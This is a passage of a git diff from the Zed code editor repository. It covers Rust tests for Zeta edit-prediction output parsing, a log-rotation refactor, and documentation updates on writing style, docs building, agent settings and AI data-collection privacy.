) + .unwrap(); + + assert_eq!( + apply_edit(excerpt, &output), + "before ctx\nctx start\neditable new\nctx end\nafter ctx\n" + ); + } + + #[test] + fn test_parse_zeta2_model_output_identity() { + let excerpt = "aaa\nbbb\nccc\nddd\neee\n"; + let editable_start = excerpt.find("bbb").unwrap(); + let editable_end = excerpt.find("ddd").unwrap(); + let input = make_input_with_context_range( + excerpt, + editable_start..editable_end, + 0..excerpt.len(), + editable_start, + ); + + let format = ZetaFormat::V0131GitMergeMarkersPrefix; + let output = + parse_zeta2_model_output("bbb\nccc\n>>>>>>> UPDATED\n", format, &input).unwrap(); + + assert_eq!(apply_edit(excerpt, &output), excerpt); + } + + #[test] + fn test_parse_zeta2_model_output_strips_end_marker() { + let excerpt = "hello\nworld\n"; + let input = make_input_with_context_range(excerpt, 0..excerpt.len(), 0..excerpt.len(), 0); + + let format = ZetaFormat::V0131GitMergeMarkersPrefix; + let output1 = + parse_zeta2_model_output("new content\n>>>>>>> UPDATED\n", format, &input).unwrap(); + let output2 = parse_zeta2_model_output("new content\n", format, &input).unwrap(); + + assert_eq!(apply_edit(excerpt, &output1), apply_edit(excerpt, &output2)); + assert_eq!(apply_edit(excerpt, &output1), "new content\n"); + } + + #[test] + fn test_parsed_output_to_patch_round_trips_through_udiff_application() { + let excerpt = "before ctx\nctx start\neditable old\nctx end\nafter ctx\n"; + let context_start = excerpt.find("ctx start").unwrap(); + let context_end = excerpt.find("after ctx").unwrap(); + let editable_start = excerpt.find("editable old").unwrap(); + let editable_end = editable_start + "editable old\n".len(); + let input = make_input_with_context_range( + excerpt, + editable_start..editable_end, + context_start..context_end, + editable_start, + ); + + let parsed = parse_zeta2_model_output( + "editable new\n>>>>>>> UPDATED\n", + ZetaFormat::V0131GitMergeMarkersPrefix, + &input, + ) + .unwrap(); + let expected = apply_edit(excerpt, &parsed); + let patch = parsed_output_to_patch(&input, parsed).unwrap(); + let patched = udiff::apply_diff_to_string(&patch, excerpt).unwrap(); + + assert_eq!(patched, expected); + } + + #[test] + fn test_special_tokens_not_triggered_by_comment_separator() { + // Regression test for https://github.com/zed-industries/zed/issues/52489 + let excerpt = "fn main() {\n // =======\n println!(\"hello\");\n}\n"; + let input = make_input(excerpt, 0..excerpt.len(), 0, vec![], vec![]); + assert!( + !prompt_input_contains_special_tokens(&input, ZetaFormat::V0131GitMergeMarkersPrefix), + "comment containing ======= should not trigger special token detection" + ); + } } diff --git a/crates/zlog/src/sink.rs b/crates/zlog/src/sink.rs index 07e87be1b071f2538e716bb8fd2b692527363fc4..2aea9c957756011689d81618eedcf22979ea2077 100644 --- a/crates/zlog/src/sink.rs +++ b/crates/zlog/src/sink.rs @@ -56,10 +56,9 @@ pub fn init_output_file( path: &'static PathBuf, path_rotate: Option<&'static PathBuf>, ) -> io::Result<()> { - let mut file = std::fs::OpenOptions::new() - .create(true) - .append(true) - .open(path)?; + let mut enabled_sinks_file = ENABLED_SINKS_FILE + .try_lock() + .expect("Log file lock is available during init"); SINK_FILE_PATH .set(path) @@ -70,22 +69,30 @@ pub fn init_output_file( .expect("Init file output should only be called once"); } - let mut enabled_sinks_file = ENABLED_SINKS_FILE - .try_lock() - .expect("Log file lock is available during init"); - - let size_bytes = file.metadata().map_or(0, |metadata| metadata.len()); - if size_bytes >= SINK_FILE_SIZE_BYTES_MAX { - rotate_log_file(&mut file, Some(path), path_rotate, &SINK_FILE_SIZE_BYTES); - } else { - SINK_FILE_SIZE_BYTES.store(size_bytes, Ordering::Release); - } - + let file = open_or_create_log_file(path, path_rotate, SINK_FILE_SIZE_BYTES_MAX)?; + SINK_FILE_SIZE_BYTES.store(file.metadata().map_or(0, |m| m.len()), Ordering::Release); *enabled_sinks_file = Some(file); Ok(()) } +fn open_or_create_log_file( + path: &PathBuf, + path_rotate: Option<&PathBuf>, + sink_file_size_bytes_max: u64, +) -> Result { + let size_bytes = std::fs::metadata(path).map(|metadata| metadata.len()); + match size_bytes { + Ok(size_bytes) if size_bytes >= sink_file_size_bytes_max => { + rotate_log_file(Some(path), path_rotate).map(|it| it.unwrap()) + } + _ => std::fs::OpenOptions::new() + .create(true) + .append(true) + .open(path), + } +} + const LEVEL_OUTPUT_STRINGS: [&str; 6] = [ " ", // nop: ERROR = 1 "ERROR", // @@ -144,11 +151,11 @@ pub fn submit(mut record: Record) { record.message ); } - let mut file = ENABLED_SINKS_FILE.lock().unwrap_or_else(|handle| { + let mut file_guard = ENABLED_SINKS_FILE.lock().unwrap_or_else(|handle| { ENABLED_SINKS_FILE.clear_poison(); handle.into_inner() }); - if let Some(file) = file.as_mut() { + if let Some(file) = file_guard.as_mut() { struct SizedWriter<'a> { file: &'a mut std::fs::File, written: u64, @@ -182,12 +189,16 @@ pub fn submit(mut record: Record) { SINK_FILE_SIZE_BYTES.fetch_add(writer.written, Ordering::AcqRel) + writer.written }; if file_size_bytes > SINK_FILE_SIZE_BYTES_MAX { - rotate_log_file( - file, - SINK_FILE_PATH.get(), - SINK_FILE_PATH_ROTATE.get(), - &SINK_FILE_SIZE_BYTES, - ); + *file_guard = None; + let file = rotate_log_file(SINK_FILE_PATH.get(), SINK_FILE_PATH_ROTATE.get()); + match file { + Ok(Some(file)) => *file_guard = Some(file), + Ok(None) => {} + Err(e) => { + eprintln!("Failed to open log file: {e}") + } + } + SINK_FILE_SIZE_BYTES.store(0, Ordering::Release); } } } @@ -247,19 +258,13 @@ impl std::fmt::Display for SourceFmt<'_> { } fn rotate_log_file( - file: &mut fs::File, path: Option, path_rotate: Option, - atomic_size: &AtomicU64, -) where +) -> std::io::Result> +where PathRef: AsRef, { - if let Err(err) = file.flush() { - eprintln!( - "Failed to flush log file before rotating, some logs may be lost: {}", - err - ); - } + let path = path.as_ref().map(PathRef::as_ref); let rotation_error = match (path, path_rotate) { (Some(_), None) => Some(anyhow::anyhow!("No rotation log file path configured")), (None, _) => Some(anyhow::anyhow!("No log file path configured")), @@ -270,46 +275,53 @@ fn rotate_log_file( if let Some(err) = rotation_error { eprintln!("Log file rotation failed. Truncating log file anyways: {err}",); } - _ = file.set_len(0); - - // SAFETY: It is safe to set size to 0 even if set_len fails as - // according to the documentation, it only fails if: - // - the file is not writeable: should never happen, - // - the size would cause an overflow (implementation specific): 0 should never cause an overflow - atomic_size.store(0, Ordering::Release); + path.map(|path| { + fs::OpenOptions::new() + .create(true) + .write(true) + .truncate(true) + .open(path) + }) + .transpose() } #[cfg(test)] mod tests { + use super::*; #[test] - fn test_rotate_log_file() { + fn test_open_or_create_log_file_rotate() { let temp_dir = tempfile::tempdir().unwrap(); let log_file_path = temp_dir.path().join("log.txt"); let rotation_log_file_path = temp_dir.path().join("log_rotated.txt"); - let mut file = fs::File::create(&log_file_path).unwrap(); let contents = String::from("Hello, world!"); - file.write_all(contents.as_bytes()).unwrap(); + std::fs::write(&log_file_path, &contents).unwrap(); - let size = AtomicU64::new(contents.len() as u64); - - rotate_log_file( - &mut file, - Some(&log_file_path), - Some(&rotation_log_file_path), - &size, - ); + open_or_create_log_file(&log_file_path, Some(&rotation_log_file_path), 4).unwrap(); assert!(log_file_path.exists()); assert_eq!(log_file_path.metadata().unwrap().len(), 0); assert!(rotation_log_file_path.exists()); - assert_eq!( - std::fs::read_to_string(&rotation_log_file_path).unwrap(), - contents, - ); - assert_eq!(size.load(Ordering::Acquire), 0); + assert_eq!(std::fs::read_to_string(&log_file_path).unwrap(), ""); + } + + #[test] + fn test_open_or_create_log_file() { + let temp_dir = tempfile::tempdir().unwrap(); + let log_file_path = temp_dir.path().join("log.txt"); + let rotation_log_file_path = temp_dir.path().join("log_rotated.txt"); + + let contents = String::from("Hello, world!"); + std::fs::write(&log_file_path, &contents).unwrap(); + + open_or_create_log_file(&log_file_path, Some(&rotation_log_file_path), !0).unwrap(); + + assert!(log_file_path.exists()); + assert_eq!(log_file_path.metadata().unwrap().len(), 13); + assert!(!rotation_log_file_path.exists()); + assert_eq!(std::fs::read_to_string(&log_file_path).unwrap(), contents); } /// Regression test, ensuring that if log level values change we are made aware diff --git a/docs/.doc-examples/complex-feature.md b/docs/.doc-examples/complex-feature.md index 6a859ce5041f0e39834cc5f47f5b18248a15295e..745e6b3bcdc97dc35092bb651903f37435acc1ef 100644 --- a/docs/.doc-examples/complex-feature.md +++ b/docs/.doc-examples/complex-feature.md @@ -91,11 +91,11 @@ To disable word diff for specific languages only, add this to your settings.json File History shows the commit history for an individual file. Each entry displays the commit's author, timestamp, and message. Selecting a commit opens a diff view filtered to show only the changes made to that file in that commit. -To open File History: +To view File History: -- Right-click on a file in the Project Panel and select "Open File History" -- Right-click on a file in the Git Panel and select "Open File History" -- Right-click on an editor tab and select "Open File History" +- Right-click on a file in the Project Panel and select "View File History" +- Right-click on a file in the Git Panel and select "View File History" +- Right-click on an editor tab and select "View File History" - Use the Command Palette and search for "file history" ## Fetch, Push, and Pull {#fetch-push-pull} diff --git a/docs/.prettierignore b/docs/.prettierignore index a52439689a83a1c2e834918c39441186b47120e5..c742ed4b6859f32219cecbac9f722db8a6929710 100644 --- a/docs/.prettierignore +++ b/docs/.prettierignore @@ -1,2 +1,5 @@ # Handlebars partials are not supported by Prettier. *.hbs + +# Automatically generated +theme/c15t@*.js diff --git a/docs/AGENTS.md b/docs/AGENTS.md index fdd61ff6aeaf8cd09ae0b017c5199e7033fba964..54f477472b1b4d22f06623220d5fb4a3eb181db4 100644 --- a/docs/AGENTS.md +++ b/docs/AGENTS.md @@ -126,6 +126,59 @@ Images are hosted externally. Reference format: - With anchors: `[Custom Models](./llm-providers.md#anthropic-custom-models)` - Parent directory: `[Telemetry](../telemetry.md)` +## Voice and Tone + +### Core Principles + +- **Practical over promotional**: Focus on what users can do, not on selling Zed. Avoid marketing language like "powerful," "revolutionary," or "best-in-class." +- **Honest about limitations**: When Zed lacks a feature or doesn't match another tool's depth, say so directly. Pair limitations with workarounds or alternative workflows. +- **Direct and concise**: Use short sentences. Get to the point. Developers are scanning, not reading novels. +- **Second person**: Address the reader as "you." Avoid "the user" or "one." +- **Present tense**: "Zed opens the file" not "Zed will open the file." + +### What to Avoid + +- Superlatives without substance ("incredibly fast," "seamlessly integrated") +- Hedging language ("simply," "just," "easily")—if something is simple, the instructions will show it +- Apologetic tone for missing features—state the limitation and move on +- Comparisons that disparage other tools—be factual, not competitive +- Lots of use of em or en dashes. + +## Examples of Good Copy + +### Good: Direct and actionable + +``` +To format on save, open the Settings Editor (`Cmd+,`) and search for `format_on_save`. Set it to `on`. + +Or add this to your settings.json: +{ + "format_on_save": "on" +} +``` + +### Bad: Wordy and promotional + +``` +Zed provides a powerful and seamless formatting experience. Simply navigate to the settings and you'll find the format_on_save option which enables Zed's incredible auto-formatting capabilities. +``` + +### Good: Honest about limitations + +``` +Zed doesn't index your project like IntelliJ does. You open a folder and start working immediately—no waiting. The trade-off: cross-project analysis relies on language servers, which may not go as deep. + +**How to adapt:** +- Use `Cmd+Shift+F` for project-wide text search +- Use `Cmd+O` for symbol search (powered by your language server) +``` + +### Bad: Defensive or dismissive + +``` +While some users might miss indexing, Zed's approach is actually better because it's faster. +``` + ## Scope ### In-Scope Documentation @@ -204,13 +257,14 @@ Inherit all conventions from `docs/.rules`. Key points: ### Terminology -| Use | Instead of | -| --------------- | -------------------------------------- | -| folder | directory | -| project | workspace | -| Settings Editor | settings UI | -| command palette | command bar | -| panel | sidebar (be specific: "Project Panel") | +| Use | Instead of | +| --------------- | --------------------------------------------------------------------- | +| folder | directory | +| project | workspace | +| Settings Editor | settings UI | +| command palette | command bar | +| panel | tool window, sidebar (be specific: "Project Panel," "Terminal Panel") | +| language server | LSP (spell out first use, then LSP is fine) | ## Zed-Specific Conventions diff --git a/docs/README.md b/docs/README.md index e1649f4bc99e1668352a46ee2071dcfe1775f4a7..38be153de34b7e32e410fa67710297cca653d699 100644 --- a/docs/README.md +++ b/docs/README.md @@ -4,12 +4,15 @@ Welcome to Zed's documentation. This is built on push to `main` and published automatically to [https://zed.dev/docs](https://zed.dev/docs). -To preview the docs locally you will need to install [mdBook](https://rust-lang.github.io/mdBook/) (`cargo install mdbook@0.4.40`) and then run: +To preview the docs locally you will need to install [mdBook](https://rust-lang.github.io/mdBook/) (`cargo install mdbook@0.4.40`), generate the action metadata, and then serve: ```sh +script/generate-action-metadata mdbook serve docs ``` +The first command dumps an action manifest to `crates/docs_preprocessor/actions.json`. Without it, the preprocessor cannot validate keybinding and action references in the docs and will report errors. You only need to re-run it when actions change. + It's important to note the version number above. For an unknown reason, as of 2025-04-23, running 0.4.48 will cause odd URL behavior that breaks things. Before committing, verify that the docs are formatted in the way Prettier expects with: @@ -53,6 +56,14 @@ This will output a code element like: `Cmd + , | Ctrl + ,`. We then By using the action name, we can ensure that the keybinding is always up-to-date rather than hardcoding the keybinding. +#### Keymap Overlays + +`{#kb:keymap_name scope::Action}` - e.g., `{#kb:jetbrains editor::GoToDefinition}`. + +This resolves the keybinding from a keymap overlay (e.g., JetBrains) first, falling back to the default keymap if the overlay doesn't define a binding for that action. This is useful for sections where the documentation expects a special base keymap to be configured. + +Supported overlays: `jetbrains`. + ### Actions `{#action scope::Action}` - e.g., `{#action zed::OpenSettings}`. @@ -64,6 +75,22 @@ This will render a human-readable version of the action name, e.g., "zed: open s Templates are functions that modify the source of the docs pages (usually with a regex match and replace). You can see how the actions and keybindings are templated in `crates/docs_preprocessor/src/main.rs` for reference on how to create new templates. +## Consent Banner + +We pre-bundle the `c15t` package because the docs pipeline does not include a JS bundler. If you need to update `c15t` and rebuild the bundle, use: + +``` +mkdir c15t-bundle && cd c15t-bundle +npm init -y +npm install c15t@ esbuild +echo "import { getOrCreateConsentRuntime } from 'c15t'; window.c15t = { getOrCreateConsentRuntime };" > entry.js +npx esbuild entry.js --bundle --format=iife --minify --outfile=c15t@.js +cp c15t@.js ../theme/c15t@.js +cd .. && rm -rf c15t-bundle +``` + +Replace `` with the new version of `c15t` you are installing. Then update `book.toml` to reference the new bundle filename. + ### References - Template Trait: `crates/docs_preprocessor/src/templates.rs` diff --git a/docs/book.toml b/docs/book.toml index 86fa447f581fba88ff7df53bb51e08440585a9dc..3269003a1d37ede19ec18b62809a928a08764d2f 100644 --- a/docs/book.toml +++ b/docs/book.toml @@ -23,8 +23,8 @@ default-description = "Learn how to use and customize Zed, the fast, collaborati default-title = "Zed Code Editor Documentation" no-section-label = true preferred-dark-theme = "dark" -additional-css = ["theme/page-toc.css", "theme/plugins.css", "theme/highlight.css"] -additional-js = ["theme/page-toc.js", "theme/plugins.js"] +additional-css = ["theme/page-toc.css", "theme/plugins.css", "theme/highlight.css", "theme/consent-banner.css"] +additional-js = ["theme/page-toc.js", "theme/plugins.js", "theme/c15t@2.0.0-rc.3.js", "theme/analytics.js"] [output.zed-html.print] enable = false diff --git a/docs/src/SUMMARY.md b/docs/src/SUMMARY.md index 2b45c581685e9ecb63888edd256ec14b0da94a30..2dca46d99a4a274300e82f67b6f0eac96bb55ee9 100644 --- a/docs/src/SUMMARY.md +++ b/docs/src/SUMMARY.md @@ -17,7 +17,6 @@ - [External Agents](./ai/external-agents.md) - [Inline Assistant](./ai/inline-assistant.md) - [Edit Prediction](./ai/edit-prediction.md) -- [Text Threads](./ai/text-threads.md) - [Rules](./ai/rules.md) - [Model Context Protocol](./ai/mcp.md) - [Configuration](./ai/configuration.md) @@ -45,6 +44,7 @@ - [Debugger](./debugger.md) - [REPL](./repl.md) - [Git](./git.md) +- [Modelines](./modelines.md) # Collaboration @@ -161,7 +161,7 @@ - [Debugger Extensions](./extensions/debugger-extensions.md) - [Theme Extensions](./extensions/themes.md) - [Icon Theme Extensions](./extensions/icon-themes.md) -- [Slash Command Extensions](./extensions/slash-commands.md) +- [Snippets Extensions](./extensions/snippets.md) - [Agent Server Extensions](./extensions/agent-servers.md) - [MCP Server Extensions](./extensions/mcp-extensions.md) @@ -182,6 +182,7 @@ # Account & Privacy - [Authenticate](./authentication.md) +- [Roles](./roles.md) - [Privacy and Security](./ai/privacy-and-security.md) - [Worktree Trust](./worktree-trust.md) - [AI Improvement](./ai/ai-improvement.md) diff --git a/docs/src/ai/agent-panel.md b/docs/src/ai/agent-panel.md index 7e183d38550d3624a0c9a48051e95ca4c568d72d..89b0126c55a12b08d4f21a01fea38758c4d509b7 100644 --- a/docs/src/ai/agent-panel.md +++ b/docs/src/ai/agent-panel.md @@ -34,7 +34,7 @@ The sections below cover what you can do from here. By default, the Agent Panel uses Zed's first-party agent. -To choose another agent, go to the plus button in the top-right of the Agent Panel and pick either one of the [external agents](./external-agents.md) installed out of the box or a new [Text Thread](./text-threads.md). +To choose another agent, go to the plus button in the top-right of the Agent Panel and pick one of the [external agents](./external-agents.md) installed out of the box. ### Editing Messages {#editing-messages} @@ -67,7 +67,9 @@ Right-click on any agent response in the thread view to access a context menu wi ### Navigating the Thread {#navigating-the-thread} -In long conversations, use the scroll arrow buttons at the bottom of the panel to jump to your most recent prompt or to the very beginning of the thread. +In long conversations, use the scroll arrow buttons at the bottom of the panel to jump to your most recent prompt or to the very beginning of the thread. You can also scroll the thread using arrow keys, Page Up/Down, Home/End, and Shift+Page Up/Down to jump between messages, when the thread pane is focused. + +When focus is in the message editor, you can also use {#kb agent::ScrollOutputPageUp}, {#kb agent::ScrollOutputPageDown}, {#kb agent::ScrollOutputToTop}, {#kb agent::ScrollOutputToBottom}, {#kb agent::ScrollOutputLineUp}, and {#kb agent::ScrollOutputLineDown} to navigate the thread, or {#kb agent::ScrollOutputToPreviousMessage} and {#kb agent::ScrollOutputToNextMessage} to jump between your prompts. ### Navigating History {#navigating-history} @@ -222,15 +224,6 @@ All [Zed's hosted models](./models.md) support tool calling out-of-the-box. Similarly to the built-in tools, some models may not support all tools included in a given MCP Server. Zed's UI will inform you about this via a warning icon that appears close to the model selector. -## Text Threads {#text-threads} - -["Text Threads"](./text-threads.md) present your conversation with the LLM in a different format—as raw text. -With text threads, you have full control over the conversation data. -You can remove and edit responses from the LLM, swap roles, and include more context earlier in the conversation. - -Text threads are Zed's original assistant panel format, preserved for users who want direct control over conversation data. -Autonomous code editing (where the agent writes to files) is only available in the default thread format, not text threads. - ## Errors and Debugging {#errors-and-debugging} If you hit an error or unusual LLM behavior, open the thread as Markdown with `agent: open thread as markdown` and attach it to your GitHub issue. diff --git a/docs/src/ai/agent-settings.md b/docs/src/ai/agent-settings.md index 0547f19c9ca0e58cb5d63d7ae1c5231d091a6503..28ee927e4ab4110e6e46a4a8d551093243d72a09 100644 --- a/docs/src/ai/agent-settings.md +++ b/docs/src/ai/agent-settings.md @@ -1,6 +1,6 @@ --- title: AI Agent Settings - Zed -description: Customize Zed's AI agent: default models, temperature, tool approval, auto-run commands, notifications, and panel options. +description: "Customize Zed's AI agent: default models, temperature, tool approval, auto-run commands, notifications, and panel options." --- # Agent Settings @@ -140,19 +140,6 @@ Specify a custom temperature for a provider and/or model: Note that some of these settings are also surfaced in the Agent Panel's settings UI, which you can access either via the `agent: open settings` action or by the dropdown menu on the top-right corner of the panel. -### Default View - -Use the `default_view` setting to change the default view of the Agent Panel. -You can choose between `thread` (the default) and `text_thread`: - -```json [settings] -{ - "agent": { - "default_view": "text_thread" - } -} -``` - ### Font Size Use the `agent_ui_font_size` setting to change the font size of rendered agent responses in the panel. @@ -305,13 +292,16 @@ The default value is `false`. ### Sound Notification -Control whether to hear a notification sound when the agent is done generating changes or needs your input. -The default value is `false`. +Control whether to hear a notification sound when the agent is done generating changes or needs your input. The default value is `never`. + +- `"never"` (default) — Never play the sound. +- `"when_hidden"` — Only play the sound when the agent panel is not visible. +- `"always"` — Always play the sound on completion. ```json [settings] { "agent": { - "play_sound_when_agent_done": true + "play_sound_when_agent_done": "never" } } ``` diff --git a/docs/src/ai/ai-improvement.md b/docs/src/ai/ai-improvement.md index 94085058f237b942f29d43f8d82b2f0afa97a782..b1fda4cbf6c6bbc7db395394a420afbbaecfa57d 100644 --- a/docs/src/ai/ai-improvement.md +++ b/docs/src/ai/ai-improvement.md @@ -3,73 +3,98 @@ title: AI Improvement and Data Collection - Zed description: Zed's opt-in approach to AI data collection for improving the agent panel and edit predictions. --- -# Zed AI Improvement +# Zed AI Features and Privacy -## Agent Panel +## Overview -### Opt-In +AI features in Zed include: -When you use the Agent Panel through any of these means: +- [Agent Panel](./agent-panel.md) +- [Edit Predictions](./edit-prediction.md) +- [Inline Assist](./inline-assistant.md) +- Auto Git Commit Message Generation -- [Zed's hosted models](./subscription.md) -- [connecting a non-Zed AI service via API key](./llm-providers.md) -- using an [external agent](./external-agents.md) +By default, Zed does not store your prompts or code context. This data is sent to your selected AI provider (e.g., Anthropic, OpenAI, Google, or xAI) to generate responses, then discarded. Zed will not use your data to evaluate or improve AI features unless you explicitly share it (see [AI Feedback with Ratings](#ai-feedback-with-ratings)) or you opt in to edit prediction training data collection (see [Edit Predictions](#edit-predictions)). + +Zed is model-agnostic by design, and none of this changes based on which provider you choose. You can use your own API keys or Zed's hosted models without any data being retained. + +### Data Retention and Training -Zed does not persistently store user content or use user content to evaluate and/or improve our AI features, unless it is explicitly shared with Zed. Each share is opt-in, and sharing once will not cause future content or data to be shared again. +Zed's Agent Panel can be used via: -> Note that rating responses will send your data related to that response to Zed's servers. -> **_If you don't want data persisted on Zed's servers, don't rate_**. We will not collect data for improving our Agentic offering without you explicitly rating responses. +- [Zed's hosted models](./subscription.md) +- [connecting a non-Zed AI service via API key](./llm-providers.md) +- using an [external agent](./external-agents.md) via ACP -When using upstream services through Zed's hosted models, we require assurances from our service providers that your user content won't be used for training models. +When using Zed's hosted models, we require assurances from our service providers that your user content won't be used for training models. | Provider | No Training Guarantee | Zero-Data Retention (ZDR) | | --------- | ------------------------------------------------------- | --------------------------------------------------------------------------------------------------------------------------------------------- | | Anthropic | [Yes](https://www.anthropic.com/legal/commercial-terms) | [Yes](https://privacy.anthropic.com/en/articles/8956058-i-have-a-zero-data-retention-agreement-with-anthropic-what-products-does-it-apply-to) | | Google | [Yes](https://cloud.google.com/terms/service-terms) | [Yes](https://cloud.google.com/terms/service-terms), see Service Terms sections 17 and 19h | | OpenAI | [Yes](https://openai.com/enterprise-privacy/) | [Yes](https://platform.openai.com/docs/guides/your-data) | +| xAI | [Yes](https://x.ai/legal/faq-enterprise) | [Yes](https://x.ai/legal/faq-enterprise) | When you use your own API keys or external agents, **Zed does not have control over how your data is used by that service provider.** You should reference your agreement with each service provider to understand what terms and conditions apply. -### Data we collect +### AI Feedback with Ratings + +You can provide feedback on Zed's AI features by rating specific AI responses in Zed and sharing details related to those conversations with Zed. Each share is opt-in, and sharing once will not cause future content or data to be shared again. + +> **Rating = Data Sharing:** When you rate a response, your entire conversation thread is sent to Zed. This includes messages, AI responses, and thread metadata. +> **_If you don't want data persisted on Zed's servers, don't rate_**. We will not collect data for improving our AI features without you explicitly rating responses. -For prompts you have explicitly shared with us, Zed may store copies of those prompts and other data about the specific use of the Agent Panel. +### Data Collected (AI Feedback) -This data includes: +For conversations you have explicitly shared with us via rating, Zed may store: -- The prompt given to the Agent -- Any commentary you include -- Product telemetry about the agentic thread +- All messages in the thread (your prompts and AI responses) +- Any commentary you include with your rating +- Thread metadata (model used, token counts, timestamps) - Metadata about your Zed installation -### Data Handling +If you do not rate responses, Zed will not store Customer Data (code, conversations, responses) related to your usage of the AI features. + +Telemetry related to Zed's AI features is collected. This includes metadata such as the AI feature being used and high-level interactions with the feature to understand performance (e.g., Agent response time, edit acceptance/rejection in the Agent panel or edit completions). You can read more in Zed's [telemetry](../telemetry.md) documentation. Collected data is stored in Snowflake, a private database. We periodically review this data to refine the agent's system prompt and tool use. All data is anonymized and stripped of sensitive information (access tokens, user IDs, email addresses). ## Edit Predictions -By default, when using Zed Edit Predictions, Zed does not persistently store user content or use user content for training of its models. +Edit predictions can be powered by **Zed's Zeta model** or by **third-party providers** like GitHub Copilot. + +### Zed's Zeta Model (Default) + +Zed sends a limited context window to the model to generate predictions: + +- A code excerpt around your cursor (not the full file) +- Recent edits as diffs +- Relevant excerpts from related open files -### Opt-in +This data is processed transiently to generate predictions and is not retained afterward. -Users who are working on open source licensed projects may optionally opt-in to providing model improvement feedback. This opt-in occurs on a per-project basis. If you work on multiple open source projects and wish to provide model improvement feedback you will have to opt-in for each individual project. +### Third-Party Providers -When working on other projects where you haven't opted-in, Zed will not persistently store user content or use user content for training of its models. +When using third-party providers like GitHub Copilot, **Zed does not control how your data is handled** by that provider. You should consult their Terms and Conditions directly. -You can see exactly how Zed detects open source licenses in: [license_detection.rs](https://github.com/zed-industries/zed/blob/main/crates/edit_prediction/src/license_detection.rs). +Note: Zed's `disabled_globs` settings will prevent predictions from being requested, but third-party providers may receive file content when files are opened. -### Exclusions +### Training Data: Opt-In for Open Source Projects -Zed will intentionally exclude certain files from Predictive Edits entirely, even when you have opted-in to model improvement feedback. +Zed does not collect training data for our edit prediction model unless the following conditions are met: -You can inspect this exclusion list by opening `zed: open default settings` from the command palette: +1. **You opt in** – Toggle "Training Data Collection" under the **Privacy** section of the edit prediction status bar menu (click the edit prediction icon in the status bar). +2. **The project is open source** — detected via LICENSE file ([see detection logic](https://github.com/zed-industries/zed/blob/main/crates/edit_prediction/src/license_detection.rs)) +3. **The file isn't excluded** — via `disabled_globs` + +### File Exclusions + +Certain files are always excluded from edit predictions—regardless of opt-in status: ```json [settings] { "edit_predictions": { - // A list of globs representing files that edit predictions should be disabled for. - // There's a sensible default list of globs already included. - // Any addition to this list will be merged with the default list. "disabled_globs": [ "**/.env*", "**/*.pem", @@ -92,22 +117,17 @@ Users may explicitly exclude additional paths and/or file extensions by adding t } ``` -### Data we collect - -For open source projects where you have opted-in, Zed may store copies of requests and responses to the Zed AI Prediction service. - -This data includes: +### Data Collected (Edit Prediction Training Data) -- sampled edit prediction examples (cursor context + recent diffs/edits) for offline evaluation -- the edit prediction -- a portion of the buffer content around the cursor -- a few recent edits -- the current buffer outline -- diagnostics (errors, warnings, etc) from language servers +For open source projects where you've opted in, Zed may collect: -### Data Handling +- Code excerpt around your cursor +- Recent edit diffs +- The generated prediction +- Repository URL and git revision +- Buffer outline and diagnostics -Collected data is stored in Snowflake, a private database. We periodically select training samples from this data. All data is anonymized and stripped of sensitive information (access tokens, user IDs, email addresses). The training dataset is publicly available at [huggingface.co/datasets/zed-industries/zeta](https://huggingface.co/datasets/zed-industries/zeta). +Collected data is stored in Snowflake. We periodically review this data to select training samples for inclusion in our model training dataset. We ensure any included data is anonymized and contains no sensitive information (access tokens, user IDs, email addresses, etc). This training dataset is publicly available at [huggingface.co/datasets/zed-industries/zeta](https://huggingface.co/datasets/zed-industries/zeta). ### Model Output @@ -115,4 +135,4 @@ We then use this training dataset to fine-tune [Qwen2.5-Coder-7B](https://huggin ## Applicable terms -Please see the [Zed Terms of Service](https://zed.dev/terms-of-service) for more. +Please see the [Zed Terms of Service](https://zed.dev/terms) for more. diff --git a/docs/src/ai/edit-prediction.md b/docs/src/ai/edit-prediction.md index 973dc9546a8b81ad58fc996102ff25aed2d241a9..496bf925e5b137c8b4749207c6785d30913440ae 100644 --- a/docs/src/ai/edit-prediction.md +++ b/docs/src/ai/edit-prediction.md @@ -1,21 +1,23 @@ --- -title: AI Code Completion in Zed - Zeta, Copilot, Sweep, Mercury Coder -description: Set up AI code completions in Zed with Zeta (built-in), GitHub Copilot, Sweep, Codestral, or Mercury Coder. Multi-line predictions on every keystroke. +title: AI Code Completion in Zed - Zeta, Copilot, Codestral, Mercury Coder +description: Set up AI code completions in Zed with Zeta (built-in), GitHub Copilot, Codestral, or Mercury Coder. Multi-line predictions on every keystroke. --- # Edit Prediction Edit Prediction is how Zed's AI code completions work: an LLM predicts the code you want to write. -Each keystroke sends a new request to the edit prediction provider, which returns individual or multi-line suggestions that can be quickly accepted by pressing `tab`. +Each keystroke sends a new request to the edit prediction provider, which returns individual or multi-line suggestions you accept by pressing `tab`. -The default provider is [Zeta, a proprietary open source and open dataset model](https://huggingface.co/zed-industries/zeta), but you can also use [other providers](#other-providers) like GitHub Copilot, Sweep, Mercury Coder, and Codestral. +The default provider is [Zeta, a proprietary open source and open dataset model](https://huggingface.co/zed-industries/zeta), but you can also use [other providers](#other-providers) like GitHub Copilot, Mercury Coder, and Codestral. ## Configuring Zeta To use Zeta, [sign in](../authentication.md#what-features-require-signing-in). Once signed in, predictions appear as you type. -You can confirm that Zeta is properly configured either by verifying whether you have the following code in your settings file: +You can confirm that Zeta is properly configured by opening the [Settings Editor](zed://settings/edit_predictions.providers) (`Cmd+,` on macOS or `Ctrl+,` on Linux/Windows) and searching for `edit_predictions`. The `provider` field should be set to `Zed AI`. + +Or verify this in your settings.json: ```json [settings] { @@ -33,7 +35,7 @@ The free plan includes 2,000 Zeta predictions per month. The [Pro plan](../ai/pl ### Switching Modes {#switching-modes} -Zed's Edit Prediction comes with two different display modes: +Edit Prediction has two display modes: 1. `eager` (default): predictions are displayed inline as long as it doesn't conflict with language server completions 2. `subtle`: predictions only appear inline when holding a modifier key (`alt` by default) @@ -52,191 +54,93 @@ Or directly via the UI through the status bar menu: > Note that edit prediction modes work with any prediction provider. -### Conflict With Other `tab` Actions {#edit-predictions-conflict} - -By default, when `tab` would normally perform a different action, Zed requires a modifier key to accept predictions: +## Default Key Bindings -1. When the language server completions menu is visible. -2. When your cursor isn't at the right indentation level. +On macOS and Windows, you can accept edit predictions with `alt-tab`. On Linux, `alt-tab` is often used by the window manager for switching windows, so `alt-l` is the default key binding for edit predictions. -In these cases, `alt-tab` is used instead to accept the prediction. When the language server completions menu is open, holding `alt` first will cause it to temporarily disappear in order to preview the prediction within the buffer. - -On Linux, `alt-tab` is often used by the window manager for switching windows, so `alt-l` is provided as the default binding for accepting predictions. `tab` and `alt-tab` also work, but aren't displayed by default. +In `eager` mode, 